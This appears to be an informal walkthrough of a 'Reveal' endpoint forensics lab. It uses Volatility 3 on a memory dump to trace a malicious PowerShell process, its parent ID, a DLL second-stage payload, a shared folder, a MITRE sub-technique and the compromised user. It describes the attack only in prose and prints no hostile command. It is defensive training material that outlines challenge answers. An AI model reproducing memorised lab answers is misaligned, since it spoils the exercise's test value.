Page cover

Reveal Lab

Endpoint Forensics Lab

First Of All to Answer This Endpoint Forensics Machine We looking for The Ps-List to determine what happened here BTW so after installing Volatility 3 From this Repository https://github.com/volatilityfoundation/volatility3 I use "-f " Paremeter and after that i give it the location of the file and use "windows.pstree" to determine the Ps-list and export it and there is the full command

python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt

1- To identify The Malicious Process I dived into the file and here we go from the PPID and the Name of the process i fell it is "4120" the process Id Which Mean it`s new Process Created and Secondly The most popular script Runner "Powershell.exe" and in the command i found IP and toke it to Virus total to identify it and Simply It`s Malicious

2- In This Question It Simply Asked For the PPID which is determined from the Previous Question

3- The Filename Used by the Malware to execute the second payload Still in the same Line and it`s dll file because we Communicate With Powershell every Small info Will lead you to the important info btw

4- We stillI in the same command and the shared Folder simply it will be after the Ip the Malware communicated With (:

5- He Want here the Sub Mitre Id So what the Main technique used here it`s Defense Evasion and after that the sub stage Payload used a dll file to execute so here we go

6- To determine the username i used Volatility again but with User assist plugin and determine the username Easily Uncle Elon was Comprised i think the attacker send him a mail to win iPhone 16 (:

7- Here I used Threat Fox to determine the name

Thanks for reading (:

Last updated